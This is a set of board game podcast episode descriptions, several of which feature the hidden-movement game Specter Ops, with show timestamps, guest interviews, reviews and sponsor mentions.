This episode the Dukes... ... Share their recent plays of: Unlock: Squeek & Sausage, The Rose King, Study In Emerald: 2nd Edition, Cosmic Kaboom, Seikatsu, and Scythe - The Wind Gambit Expansion (7:02) ... Discuss the latest in gaming news including: the announcement of Specter Ops expansion - Broken Covenant, and the announcement of Warhammer 40,000: Heroes of Blackreach from Games Workshop and Devil Pigs (29:56) ... Interviews Lance Myxter (the Undead Viking) from Tasty Minstrel Games about their latest Deluxified Kickstarter for Downfall, hitting Kickstarter on October 17, 2017 (34:49). ... Review Greater Than Games' Spirit Island (1:09:15); ... Look back at their reviews of Potion Explosion and Pandemic: Reign of Cthulhu in their Dukes' Double-Take (1:40:01); and ... Discuss the lowest rated games that they really love (1:48:52). Twitter: @dukesofdice Facebook: /dukesofdice Dukes of Dice YouTube Channel. Subscribe on iTunes. Thanks to our awesome sponsors - please give them a visit: Tasty Minstrel Games, Game Toppers LLC, Arcane Wonders
Emerson Matsuuchi, designer of Specter Ops, goes into all the ins and outs of putting together a hidden movement game. There are very few hidden movement games out there right now which means there’s still a ton to be explored. Emerson discusses the challenges he faced and his insights on the topic. The post How to Make a Great Hidden Movement Game with Emerson Matsuuchi appeared first on Board Game Design Lab.
In this episode, Brandon and Chris got some bonus game time in over the Thanksgiving, which in no way makes up for the two day late release... but we talk about Samurai Spirit, Guild of Dungeoneering, Dishonored 2, Slamwich, Linko! and our games of the week, too. Samurai Spirit - 02:20 Guild of Dungeoneering - 06:13 Star Wars: Guild of Heroes has ships. - 09:39 Brandon's GotW: Specter Ops - 14:43 Foam Core Construction - 27:24 Further Dishonored 2 - 29:00 Slamwich and Junk Art - 33:31 Linko! - 39:42 Chris' GotW: The Castles of Burgundy card game - 42:49 Closing and Contact Info - 65:48
Recorded from War Room Studios in Albuquerque, NM : 8-9-16 This episode brought to you by BoardgameTables.com and Meeple Realty - Josh clearly doesn't know how to speak... Is it "ATAT Walker" or "A T A T Walker" - He thinks he knows the answer to all things Star Wars... Thinks! We discuss the War Room Studio Rebuild and query the audience for suggestions - Help make War Room Studio A GREAT! It's time for a checkin on the Brawling Brothers Guild! Topics include: Regalos del Verano wrapup, Most disappointing game of 2016, Castles of Ron Burgundy & a mention by our friends at Polyhedron Collider. We fire up our REVAMPED "Then" segment with a look at Killer from Steve Jackson Games and then jump into our first ever War Room Studio Redeaux with a glance back at Specter Ops. Crokinole dominates our "Now" discussion (and our play time). Our Spartacus Board Game Review is one that we've wanted to do for a long time - it isn't Cult of the New, but we've decided to do a few older games that we want to review! We wrap up with discussion about the mysterious and delicious Black Maple Hill Small Batch Kentucky Straight Bourbon. Episode Timeline: 00:00:00 - This episode sponsored by BoardGameTables.com & Meeple Realty 00:00:44 - Intro + Banter 00:18:03 - BoardGameTables.com - Not just a gaming table 00:20:10 - Then - Featuring "Killer" 00:40:10 - WarRoom Redeaux - Featuring "Specter Ops" 00:50:16 - Now 01:08:42 - Tomorrow - Featuring "Isle of Monsters" 01:12:25 - No more Grandmas Glue Stick thanks to Meeple Realty 01:14:16 - Giveaway Announcement - Dark Dealings 01:15:30 - Virtual Paper Rock Scissors - Salvation Road 01:18:50 - Spartacus Board Game Review 01:54:15 - How did Julia Child slip in here?! 01:54:33 - Feature: The Mystery of Black Maple Hill GAME TIMESTAMPS: Colt Express - 01:03:28 Crokinole - 00:51:20 Evolution: The Beginning - 01:07:20 Isle of Monsters - 01:08:58 Killer - 00:24:18 Shogun - 00:54:20 Spartacus - 01:18:50 Specter Ops - 00:40:10
HEY NOW! We're off to Origins and we can hardly contain our excitement but we still have a show to do so here it is! Today we take a look at and review My Village from Stronghold Games. Then we look back at a favorite of our group, Specter Ops. Tony T runs down all the news from around the gaming world while the gang comments. Then finally we host yet another Short Topic Extravaganza.
Subscribe to La Colina de Avalon on your iPhone or Android and don't miss a single episode. Board games with Paco Gurney and C.J. Navas on Podstar.FM. In a little over an hour we bring you the week's news from here and there, we interview Paco Yanez about the Kickstarter for Oilfield, published by ABBA Games, Jugando en Pareja tell us about Specter Ops, we continue with our gaming dictionary and we finish by recommending games about sewing, lice and trains… La Colina de Avalon is made possible by: Our patrons at podstar.fm/mecenas. Listeners like you who help us by buying through our affiliate links at Amazon.es (http://podstar.fm/amazon) and Zacatrus (http://podstar.fm/zacatrus) Contents: [00:00] Intro: “Nincompoop” by Josh Woodward. [00:56] Follow Up CJ: My afternoon of games at Juan's house. Paco: I have tried Deep Sea Adventure. It's coool. [02:36] News: Days of Wonder expansions: a mini-expansion for Five Tribes, and Europe 1912 and Nordic Countries for the Ticket to Ride app. The CLBSK are this weekend. By this time next week Origins will have started. Island Hopper, coming soon from Eagle-Gryphon. By Scott Almes, illustrations by Kwanchai Moriya and a crazy mechanic. iEllo announces the 2016 version of King of Tokio. Massive Darkness, the umpteenth million-dollar Kickstarter from CMON. Cthulhu news: the interview with Matt Leacock and Chuck Yaeger about Pandemic: Reign of Cthulhu on “The Lovecraft Ezine” [13:13] We talk with: Paco Yanez, designer of Oilfield. [23:10] Jugando en Pareja: Specter Ops (Zacatrus / Amazon) [34:38] Patrons and listeners of La Colina de Avalon. You can join our patrons at podstar.fm/mecenas. Help us by buying at our affiliate stores, Amazon and Zacatrus: http://podstar.fm/amazon – http://podstar.fm/zacatrus [41:47] Gaming Dictionary: Pick up and Deliver. [46:13] Recommendations: Paco: Patchwork (Zacatrus / Amazon). Isle of Trains (Zacatrus / Amazon). CJ: Aloha Pioha (Zacatrus / Amazon).
Contact La Colina de Avalon by e-mail, Twitter and Facebook, and subscribe to our Telegram channel! Subscribe to La Colina de Avalon on iTunes / Overcast / PocketCasts / iVoox / Spreaker / Stitcher / RSS
The holidays are here and Raf & Charlie have been playing a lot of games. It's a bit of an international episode as Charlie plays a Fallout/Mad Max mashup out of Poland and Raf has a hand in causing a Euro Crisis in a game out of Germany. They wrap the episode up with their first listener suggested segment: a Holiday Gift Giving Guide. They each choose something for a Family Game, Strategy Game, OH MY GOD Game, and the perfect option for your White Elephant or gag gift events. Euro Crisis link: http://www.doppeldenk-spiele.de/news.php (There is a button to switch to English in their menu) Games Discussed: Star Wars: Rebellion, WARCULTS, Star Wars: Risk, Euro Crisis, Waste Knights, Legendary: Predator, Rhino Hero, Codenames, Dead of Winter, Specter Ops, Clockwork Wars, X-Wing Miniatures, Loopin' Chewie, and Pie Face
We discuss Specter Ops by Emerson Matsuuchi and Plaid Hat Games. In this deduction game, you play as Hunters guarding a secret base or as the Agent sent in to discover the secrets. The Agent tracks her moves in secret and the other players try to locate and kill the agent using unique player powers and a cool car. This is similar to Scotland Yard in game play, but in a nifty scifi universe.
Too many new games! Questions (plus) Answers! Engine building games broken down! SHOW NOTES: •••What Have We Been Playing? (00:01:40)►►► Elysium, Voyages of Marco Polo, Specter Ops, Cthulhu Realms, Flip City, Dungeon of Fortune, Bottlecap Vikings •••Games of Interest (01:09:55)►►► Legends of Andor: Chada & Thorn, The Loser's Club, Unnamed Castles of Burgundy Sequel, Council of Four, Rattle Battle Grab the Loot, Dice City, Shadowrift 2nd Edition, Legacy Time Surge, Shadowrun Crossfire High Caliber Ops, Villages of Valeria, Minerva, Shakespeare, Apollo XIII, Octo Dice •••Q&A (01:40:02)►►► How often do we play games? Do we ever play "mean" games? Do we miss playing with more than 2? Am I going to design my own game? Would I take a prototype to a publisher or Kickstarter? How does the boardgame industry compare to the videogame industry? How did you relocate from the US to Malta? More questions? Send your fragen to questions@rahdo.com! •••Top 10 Revisited (02:16:35)►►► Engine building games! Original top10 video: https://www.youtube.com/watch?v=KAKtwJa9J4s •••Help Rahdo run @ https://patreon.com/rahdo •••Send your questions to questions@rahdo.com
In our thirtieth episode, Quinten and Aaron are joined by Colby Dauch and Isaac Vega of Plaid Hat Games and Emerson Matsuuchi of Nazca Games. We all talk about the games we have been playing lately, including the upcoming Ashes from Plaid Hat Games. We don't do a formal review this episode, but interview Colby, Emerson, & Isaac, asking them about their publishing background, their creation of Specter Ops and Ashes, and we had a ton of listener questions. Then we quizzed them on their knowledge of Canada in our trivia game, Know Your Neighbour to the North. This episode is sponsored by Tasty Minstrel Games & Secret Base Games
In this episode, the Desperados throw down some recently played, board game banter, review Specter Ops, examine Starship Troopers, rundown recent Kickstarter projects, and take a look at the digital app, Agricola. • 0:35:00 Recently Played Banter • 0:55:00 Specter Ops, Board Game Review • 1:17:00 Starship Troopers, Throwback Theater • 2:02:00 Kickstarter Corral • 2:25:00 Agricola, Digital Game Review
While at Origins Game Fair, I was able to talk with Colby Dauch of Plaid Hat Games. We mainly chatted about Ashes: Rise of the Phoenixborn and Specter Ops. I asked Colby how they decided how their miniatures should look, specifically, how should a werewolf look for a Plaid Hat game? At their level, does the company image go into the thought process when creating art and miniatures? Turns out, Plaid Hat Games has used the same sculptor for all of their minis, and he and Colby were friends before either of them were professionals in the board game industry. Cool. (Apologies for the audio, it was recorded on the convention floor.)
In this episode of The State of Games, Dice, Darrell, TC, and Stephanie talk about the best ways to bring game evangelism to new and inexperienced gamers, whether it's asking the best questions for curious customers at your FLGS, bringing great games to your families, or just fostering that board game excitement amongst new and old friends. All this, plus the recent contract disputes between Queen Games and Donald X., Eagle & Gryphon Games' business, Specter Ops, Cubist, Hostage Negotiator, following the rules, best Kickstarter picks, Martin Wallace, Monster Truck Mayhem, games for kids, Spyfall (of course), HABA, and so much more!
In our twenty-ninth episode, we talk about the games we have been playing lately. We also have another Dawn of the FunDead segment, with Monstrous from Secret Base Games. We also review the hidden movement game Specter Ops, and we have the second session of Boards Alive Plays: Dungeons & Dragons 5th Edition. This episode is sponsored by Tasty Minstrel Games & Grok Gaming Mats
Mike and Geoff welcome guest Emerson Matsuuchi, designer of Specter Ops and VOLT Robot Battle, to discuss hidden and programmed movement in games. Why use these techniques? What are good and bad examples? Duration: 01:14:11
In episode 88 the founders take a look at one of Steve's favorite game styles in Specter Ops from Plaid Hat Games! Then they go back and discuss their thoughts on Amerigo one year later. Finally the gang hosts yet another short topic roundup including gaming with couples, unpainted versus painted miniatures, nostalgic games and more.
Shawn and Jonathan sit down to chat with Emerson Matsuuchi, the designer of Specter Ops. We briefly discuss International TableTop Day experiences and dive into Emerson’s experiences in game design, the origins of Specter Ops, and a Metal Gear inspired promo card that could have been. Jonathan presents this week’s Punch List where he asks […]
For this episode, Suzanne and Rhiannon come back to the table for some Chit Chat and we talk about the happenings at BGG Con. I am sure you are tired […]